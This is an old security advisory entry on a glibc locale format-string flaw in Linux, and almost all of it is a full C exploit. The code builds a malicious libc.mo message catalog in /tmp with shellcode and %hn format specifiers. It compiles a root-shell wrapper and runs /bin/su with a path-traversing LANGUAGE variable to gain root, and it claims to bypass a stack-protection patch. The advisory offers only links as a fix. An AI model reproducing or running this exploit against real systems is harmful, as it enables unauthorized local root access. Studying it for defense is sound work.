COMMAND
glibc
SYSTEMS AFFECTED
Linux
PROBLEM
For complete story, take a look at following links:
http://oliver.efri.hr/~crv/security/bugs/Linux/glibc4.html
http://oliver.efri.hr/~crv/security/bugs/Linux/glibc5.html
http://oliver.efri.hr/~crv/security/bugs/mUNIXes/format3.html
Maurycy Prodeus posted following code:
/*
* "Bylem pijany (...) zaczela sciagac spodnie, nie wiedzialem co robic (...)"
* - greg@tenet.pl -
*
* GLIBC 2.1 language exploit by z33d@eth-security.net (C) 2000
* with bypassing Solar Designer Stack Patch
*
* Dedicated to greg@tenet.pl
*
* It doesn't work. ;> Try use gdb to find special value.
* Tested on Debian 2.1/2.2 ziemniak
* Greetz:
* - abusers from if.pwr.wroc.pl :))) (IF-NET)
* - y3t1, dyziu, team140 riders - brunswick bedzie nasz ... :)
* - lcamtuf - argante rulz :)
* - Sierota, oczy niebieskie mowia wprost, wczoraj wyjatkowo aktywna noc...
* :))))))))))))))))))))))
* - secure@poz.sm.pl no i wogole #sigsegv
* funkysh, cliph, yeti, detergent, kris, ja, venglin, crashkill, ...
* - breslau killers z vx na czele :>
* - ppl from my so called real life
* - kefir truskawkowy
* most code I ripped :>
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#define DEFAULT_ALIGNMENT 2
// #define DEFAULT_RETLOC 0xbfffd2ff
// #define DEFAULT_RETLOC 0xbffff798
#define DEFAULT_RETLOC 0xbffff770
#define DEFAULT_BUFFER_SIZE 2048
#define PATH "/tmp/LC_MESSAGES"
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"dupaa"
"\x31\xc0\xb0\x46\x31\xdb\x89\xd9\x4b\xcd\x80"
"\xeb\x1f\x5e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
// very special shellcode, 15 min ;> big thanks to yeti
char sh[]=
"#include <stdlib.h>\n"
"#include <stdio.h>\n"
"#include <unistd.h>\n"
"int main(){\n"
"setuid(0);\n"
"setgid(0);\n"
"system(\"/bin/bash\");\n"
"}\n";
int main(int argc, char *argv[]) {
char *buff, *buff1, *ptr;
char *env[3];
long shell_addr,retloc=DEFAULT_RETLOC;
int align=DEFAULT_ALIGNMENT;
int bsize=DEFAULT_BUFFER_SIZE;
int i,reth,retl,num=132; // maybe 121
struct stat j;
FILE *fp;
if (argc > 1) sscanf(argv[1],"%x",&retloc);
if (argc > 2) num = atoi(argv[2]);
printf("Stay sharp ...\n");
printf("Usages: %s <RETloc> <num> (118<num<140)\n",argv[0]);
if (!(buff = malloc(1024))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(buff1 = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
printf("Using RET location address: 0x%x\n", retloc);
shell_addr=0x00124270; // or 0x00124250
printf("Using Shellcode address: 0x%x\n", shell_addr);
reth = (shell_addr >> 16) & 0xffff ;
retl = (shell_addr >> 0) & 0xffff ;
ptr = buff;
for (i = 0; i <2 ; i++, retloc+=2 ){
memset(ptr,'A',4);
ptr += 4 ;
(*ptr++) = retloc & 0xff;
(*ptr++) = (retloc >> 8 ) & 0xff ;
(*ptr++) = (retloc >> 16 ) & 0xff ;
(*ptr++) = (retloc >> 24 ) & 0xff ;
}
memset(ptr,'A',align);
ptr = buff1;
for(i = 0 ; i < num ; i++ )
{
memcpy(ptr, "%.8x", 4);
ptr += 4;
}
sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
(0x10000 + reth - retl));
mkdir(PATH,0755);
chdir(PATH);
fp = fopen("libc.po", "w+");
if (!fp){
printf("Skript kidies ?\n");
exit(0);
}
fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s%s\\n\"", buff1,shellcode);
fclose(fp);
system("/usr/bin/msgfmt libc.po -o libc.mo");
i=open("/tmp/LC_MESSAGES/libc.mo",O_RDWR);
fstat(i,&j);
lseek(i,j.st_size-2,SEEK_SET);
write(i,"\0\0\0\0\0\0",6);
close(i);
fp = fopen("/tmp/sh.c","w+");
if (!fp){
printf("Skript kidies ?\n");
exit(0);
}
fprintf(fp,"%s",sh);
fclose(fp);
system("cd /tmp;gcc sh.c -o sh");
env[0] = "LANGUAGE=sk_SK/../../../../../../tmp";
env[1] = (char *)0 ;
execle("/bin/su","su","-u", buff, NULL,env);
perror("execle");
return 0;
}
SOLUTION
See URLs above.